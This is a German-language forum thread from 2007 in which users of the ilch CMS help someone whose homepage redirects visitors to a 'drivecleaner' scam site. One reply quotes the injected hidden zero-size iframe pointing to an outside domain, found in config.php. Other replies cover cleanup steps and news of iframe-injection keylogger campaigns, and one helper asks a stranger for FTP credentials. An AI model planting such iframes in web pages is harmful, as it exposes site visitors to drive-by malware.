ilch Forum » Allgemein » Plauder Ecke » Viren auf der Inetseite?!

Geschlossen
  1. #1
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    kann man einen virentest für eine internetseite machen??
    weil auf meiner hp hat sich ne andere seite davor geschoben und dies ist ein virus.

    wenn einer ne idee hat bitte posten.

    thx im vorraus
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    Muss nicht unbedingt sein,.. ich hatte das für bestimmte webseiten auch mal an einem anderen pc gings aber,... zwinker

    ansosten alle daten auf deinen pc kopieren und nach iframs suchen!

    Und nein ein virus wäre das nicht ! erst wenn dein pc davon befallen ist das war wohl eher ein hacker,... zwinker
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    thx erst ma aber wie meinste das mit iframe???

    das kommische ist es ging die ganze zeit und plötzlich war diese "drivecleaner" seite da...ohne das was geändert wurde.
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    es hat sich eine andere seite in deine seite eingebaut,... und zwar per iframe,...
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    es ist aber net in der seite sondern wenn du auf meine seite gehts ändert sich manchmal einfach die adresse und es geht auf den "dreivecleaner"
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    Was du noch schauen kannst ob das nur bei deine pc kommt oder ob es auch auf anderen pc's auftritt !! Es kann auch sein das der virus auf deinem pc ist und eben bestimmte seiten umleitet !

    mfg
    SLJ
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    nö ist bei allen die auf die seite gehen...
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    NickName gelöschter User
    .


    Zuletzt modifiziert von NickName am 14.01.2011 - 15:33:53
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    was soll ich tun?
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Vielleicht ein Link angeben, wir wollen doch auch einen Virus haben zunge
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  11. #11
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    externer Link
    man wird aber nicht immer weiter geleitet


    Zuletzt modifiziert von Peter am 13.06.2007 - 18:34:02
    0 Mitglieder finden den Beitrag gut.
  12. #12
    User Pic
    Jan Hall Of Fame
    Registriert seit
    17.01.2007
    Beiträge
    3.646
    Beitragswertungen
    54 Beitragspunkte
    Oh ja da sind viren - GEHT DA NICHT DRAUF

    gesperrtes Bild

    ka wieviele fehlermeldungen da noch gekommen wären - hab ganz schnell Verbindung getrennt. grumml


    EDIT:
    Gdata InternetSecurity 2007 bricht nach betreten der Seite auch komplett zusammen.
    Ich bin jetzt erstamal virenscan machen - wir "sehn" uns zwinker


    Zuletzt modifiziert von jankrug am 13.06.2007 - 18:49:30
    0 Mitglieder finden den Beitrag gut.
  13. #13
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Ich wäre da auch ganz bestimmt nicht mit dem IE drauf gegangen zunge
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  14. #14
    User Pic
    Jan Hall Of Fame
    Registriert seit
    17.01.2007
    Beiträge
    3.646
    Beitragswertungen
    54 Beitragspunkte
    naja hab das zurzeit beste Antivirenprogramm, von daher spielt der browser keine so große rolle zwinker
    0 Mitglieder finden den Beitrag gut.
  15. #15
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    also auf jeden fall mal die index dateien durchsuchen nach iframes und javascipten.... da gibs so eine an die 20
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  16. #16
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Du hast sehr viele iframes in deiner Seite, es ist schon so eine Art Virus bekannst, der folgende Dateien ändert -> index.php/htm login.php/htm, such in den Dateien nach iframe oder überschreib sie mit den originalen, danach gibst du CHMOD 444, damit sie nicht wieder überschrieben werden können, viel mehr kann ich dir auch nicht sagen, wie der "Virus" auf das System weiß ich nicht.
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  17. #17
    User Pic
    [CC] Yeahh Mitglied
    Registriert seit
    01.11.2006
    Beiträge
    4
    Beitragswertungen
    0 Beitragspunkte
    Hi, hatte das gleiche Problem wie du.
    Schau dir mal deinen Quelltext an, die erste Zeile ist das Problem

    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


    Habe bei mir mal alle php Dateien durchsucht und wurde in der config.php fündig, solltest also damit anfangen.
    Wenn das Problem weiterhin besteht musste auch die anderen durchsuchen.

    nicht vergessen CHMOD 444 setzen das es nicht wieder vorkommt.


    achja ich nutzte: Scripte Version: 105 , Update Version: C


    Cheers Yeahh


    Zuletzt modifiziert von [CC] Yeahh am 15.06.2007 - 21:31:41
    www.chiemsee-camper.de
    0 Mitglieder finden den Beitrag gut.
  18. #18
    User Pic
    assault Hall Of Fame
    Registriert seit
    03.11.2006
    Beiträge
    2.925
    Beitragswertungen
    1 Beitragspunkte
    scheiße... in der config.php?
    nunja.. is ja 1.05 xD
    ...aber wenns auch bei 1.1 so wird... garnicht gut:S
    0 Mitglieder finden den Beitrag gut.
  19. #19
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    so hab alles ersetzt ist aber immer noch da :'(
    0 Mitglieder finden den Beitrag gut.
  20. #20
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    hey wenn ich darf, dann schicke mir mal deine ftp zugangsdaten per icq oder pm. dann schaue ich mal ob ich was finde.
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  21. #21
    User Pic
    NickName gelöschter User
    .


    Zuletzt modifiziert von NickName am 14.01.2011 - 15:40:54
    0 Mitglieder finden den Beitrag gut.
  22. #22
    User Pic
    assault Hall Of Fame
    Registriert seit
    03.11.2006
    Beiträge
    2.925
    Beitragswertungen
    1 Beitragspunkte
    ne... weil ilch=perfekter schutz
    ^^
    hackblock könnte man vll schon anpassen... man müsste nur die pfade anpassen... schätze ich

    beim ct sec. system... das is wohl kostenpflichtig
    0 Mitglieder finden den Beitrag gut.
  23. #23
    User Pic
    NickName gelöschter User
    .


    Zuletzt modifiziert von NickName am 14.01.2011 - 15:44:27
    0 Mitglieder finden den Beitrag gut.
  24. #24
    User Pic
    NickName gelöschter User
    .


    Zuletzt modifiziert von NickName am 14.01.2011 - 15:45:11
    0 Mitglieder finden den Beitrag gut.
  25. #25
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    erstelel einfach eine box mit:

    <?php  
    // --> Anzeige des HB Counters
    $fp = fopen("hack_block/counter","r");
    if ($fp) {
        $hb_count = @fgets($fp);
        fclose($fp);
    }
    if ($hb_count == "") $hb_count = 0;
    // --> Anzeige des HB Counters - ENDE
    
    eval ("\$boxlinks[]= \"".getTemplate("navigation/hackblocknavbox")."\";");  
    
    echo " $hb_count Angriffe wurden geblockt!";
    ?>


    geb keine garantie
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  26. #26
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    der ftp gehört net mir ist der von der gemeinde deshalb kann ich es net einfach rausrücken...

    aber ich hab alles ersetzt und es ist noch da...?!?
    0 Mitglieder finden den Beitrag gut.
  27. #27
    User Pic
    freak Mitglied
    Registriert seit
    31.01.2007
    Beiträge
    856
    Beitragswertungen
    0 Beitragspunkte
    hast mal die orginal daten hochgeladen
    0 Mitglieder finden den Beitrag gut.
  28. #28
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    ne noch alles da.

    wegen dem ftp... ändere das pw .. geb mir das neue und wenn ich alles bereinigt habe dann kannste es wieder ändern.

    und blödsinn mache ich nicht, sonst wäre ich nicht im ilch team.
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  29. #29
    User Pic
    Peter Mitglied
    Registriert seit
    16.12.2006
    Beiträge
    171
    Beitragswertungen
    0 Beitragspunkte
    is nen argument...

    wie kann ich den nen 2ten benutzer anlegen???


    Zuletzt modifiziert von Peter am 18.06.2007 - 10:51:50
    0 Mitglieder finden den Beitrag gut.
  30. #30
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    ZitatZitat
    Schneller Trojaner: Seit Freitag mehr als 10.000 Webseiten infiziert
    theregister.co.uk hat von einem Trojaner berichtet, der sich extrem schnell verbreitet.
    Angeblich hat ein sich schnell verbreitender Trojan-Downloader bereits mehr als 10.000 Internet-Auftritte infiziert. Derzeit arbeitet laut theregister.co.uk Trend Micro mit dem FBI in dieser Sachlage zusammen. Zwischen Freitag- und Sonntag-Nacht soll sich die Anzahl der infizierten Seiten von 1100 auf 2500 vergrößert haben. Seit Montagnachmittag kalifornischer Zeit soll sich die Zahl auf über 10.000 ausgeweitet haben. Dies sagte Paul Ferguson von Trend Micro.


    Die Angreifer versuchen einen unsichtbaren iFrame auf den infizierten Servern zu platzieren. Diese versuchen bereits gepatchte Windows-Schwachstellen auszunutzen und Client-PCs mit einem Keylogger zu infizieren. Die Experten rätseln derzeit, wie die Angreifer die Infizierung der Server bewerkstelligten. Fergusen sagte, dass das Phänomen weltweit auftrete. Die pure Anzahl der Infektionen halte die Experten auf Trab. Viele der belasteten Seiten sollen in Italien gehostet sein. Ferguson soll außerdem gesagt haben: „All dieses Web-2.0-Zeugs (two o) artet in Web Uh Oh aus!“(jdo)

    von www.tecchannel.de


    denke mal das ist der grund wegen den viren die hier ein paar haben, also kein lücke im script sondern eher eine im server.


    @ peter... schaue mal ins webinterface von deinem hoster


    Zuletzt modifiziert von HeX am 19.06.2007 - 13:24:02
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Plauder Ecke

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten